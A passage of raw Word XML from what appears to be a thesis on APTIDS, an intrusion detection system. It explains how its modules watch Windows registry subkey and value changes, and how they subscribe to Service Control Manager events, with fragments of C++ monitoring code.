      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRPr="00F05F19" w:rsidRDefault="0055127B" w:rsidP="00F05F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cSubkeys: The number of subkeys in the current snapshot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&lt; cSubKeys)){</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nCount = (cSubKeys - *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</w:t>
      </w:r>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AE6875" w:rsidRDefault="00AE6875"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AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Based on nCount, RegQuery can indicate which event has happened in the registry database.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 xml:space="preserve">nCount &lt; 0, there was a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>key added to the registry database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Its information could have been added to the last position in the current subkey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>chain. (This is only right for almost key. There are some key that has its subkey position arranged by a third party process. Windows Services is an example.)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nCount ==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0, there was a subkey modified in registry database. In this thesis we only identified for change in subkey name. When a subkey change its name, it should be move to the last position in the subkey chain.</w:t>
      </w:r>
      <w:r w:rsidR="003F590C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore, the previous subkey in the last query is now different from the current subkey in the last position of the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290AB6" w:rsidRDefault="00290AB6" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If nCount &gt; 0, there was a subkey deleted from the registry database. RegQuery do nothing in this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002935B6" w:rsidRDefault="002935B6" w:rsidP="002935B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="002935B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00290AB6" w:rsidRDefault="003C1ED4" w:rsidP="003F590C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In the situation when nCount &lt;= 0, the last subkey in the chain is suspicious.</w:t>
      </w:r>
      <w:r w:rsidR="009B2BE7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> In case nCount &lt; 0, we log the subkey which is in the last position of the current subkey chain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B2BE7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When nCount = 0, if the name of subkey in the last position in the current query is different from that name in the previous query, we log that last subkey. RegQuery does nothing on other situations.</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L"Key added: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 0) &amp;&amp; (cSubKeys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subkey in the last pos</w:t>
      </w:r>
      <w:r w:rsidR="00B728B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ition is diffe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rent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(wcscmp(lpLastSubkeyName, achKey))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L"Key modified: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D15150" w:rsidRDefault="00D15150"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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743CCD" w:rsidRDefault="00F05F19" w:rsidP="00D15150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The logging procedure is quite simple. RegQuery first get the time when change happened, then concatenate that time and added information about the registry subkey which is changed and called a function for writing that information out. We will discuss the logging procedure in a later section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00F05F19" w:rsidP="00743CCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Monitoring the Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00C60196" w:rsidP="00F05F19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Like</w:t>
      </w:r>
      <w:r w:rsidR="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the procedure for monitoring subkeys, when the current number of value is larger than 0, RegQuery read every value information of that key using a Windows API called “RegEnumValue”.</w:t>
      </w:r>
      <w:r w:rsidR="00DB2D4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Similar to the process for monitoring subkeys, “RegEnumValue” also return a “retCode” which is a value indicating the return code of the calling function.</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retCode=ERROR_SUCCESS; i&lt;cValues;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cchValue = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_VALUE_NAME</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achValue[0] = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>'\0'</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RegEnumValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</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achValue,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// the return value name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&amp;cchValue, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// value name's size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DB2D4C" w:rsidRDefault="00581DDE"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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// listing value for monitor and debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00DB2D4C" w:rsidRDefault="002565A7"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00F05F19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery also defines an “nCount” indicating the different between the previous number of value and the current number of value.</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&lt; cValues) &amp;&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</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nCount = cValues - *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</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81DDE" w:rsidRDefault="00581DDE" w:rsidP="00581DDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Based on nCount, RegQuery can indicate which event has happened in the registry database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If nCount &lt; 0, there was a value added to the registry database. Its information could have been added to the last position in the current value chain. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRPr="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If nCount == 0, there was a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> modified in registry database. In this </w:t>
      </w:r>
      <w:r w:rsidR="0093414E" w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>thesis,</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> only identified for change in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> name. When a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> change</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> its name, it should be move to the last position in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> chain. Therefore, the previous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’s name</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the last query is now different from the current </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">name </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>in the last position of the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00581DDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If nCount &gt; 0, there was a value deleted from the registry database. RegQuery do nothing in this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2BE7" w:rsidRPr="009B2BE7" w:rsidRDefault="009B2BE7" w:rsidP="009B2BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In the situation when nCount &lt;= 0, the last value in the chain is suspicious. In case nCount &lt; 0, we log the value which is in the last position of the current value chain. When nCount = 0, if the name of value in the last position in the current query is different from that name in the previous query, we log that last subkey. RegQuery does nothing on other situations.</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(cValues &gt; *nValues))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wcscpy(wchLogBuffer,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New value added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Name added :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wcscat(wchLogBuffer,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(*nValues == cValues))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L"Last Value: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpLastValueName);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value in the last position is different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(wcscmp(lpLastValueName, achValue))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getDateTime(</w:t>
      </w:r>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wcscpy(wchLogBuffer,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New value modified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Name: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wcscat(wchLogBuffer,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C60196" w:rsidRDefault="004829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B2BE7" w:rsidRDefault="009B2BE7" w:rsidP="009B2BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="008F0F14">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2BE7" w:rsidRDefault="008F0F14" w:rsidP="008F0F14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc485239606"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor Module’s source code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="00054518" w:rsidRDefault="00054518" w:rsidP="008F0F14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>APTIDS implements Service Monitoring module for identifying and capturing any anomalous behavior occurs to Windows Services. APTIDS calls “SvcChangeNotify” as an independent thread to perform service monitoring tasks.</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SvcChangeNotify(){</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EVT_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> subscriptionHandle;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SC_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> scManagerHandle;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notifyEventHandle;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SERVICE_NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> notifyBuffer;</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hHeap;</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SECURITY_ATTRIBUTES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> secAttribute;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hHeap = HeapCreate(0,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0);</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 pstCallbackContext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HeapAlloc(hHeap,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8F0F14" w:rsidRDefault="00054518" w:rsidP="00F73C0C">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t>pstCallbackContext-&gt;wchLogBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)calloc(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="008F0F14" w:rsidRDefault="002565A7" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004829A7" w:rsidRDefault="00F73C0C" w:rsidP="004829A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SvcChangeNotify defines some variables for its functionalities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73C0C" w:rsidRPr="00F73C0C" w:rsidRDefault="00F73C0C" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">subscriptionHandle: An event subscription handle which is used for creating a subscription that </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73C0C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>will receive current and future events from a channel or log file that mat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ch the specified query criteria specifying in the calling function named “EvtSubcribe”. </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subscriptionHandle = EvtSubscribe(</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L"*[System[Provider[@Name='Service Control Manager']]]"</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SubscribeCallback,</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F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>EvtSubscribeToFutureEvents</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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3C0C" w:rsidRDefault="00F73C0C" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>EvtSubscribe is a Windows API used for creating a subscription, the channel in this context is “System”  and the XPath query is “*[System[Provider [@Name=’Service Control Manager’]]]” which indicates that this is a subscription for the Service Control Manager which is belong to the System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73C0C" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>scManagerHandle: A handle for Service Control Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>notifyEventHandle: An event handle for notifying change happening to SCM. This handle is used later by NotifyServiceStatusChange and WaitForSingle Object to capture SCM events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
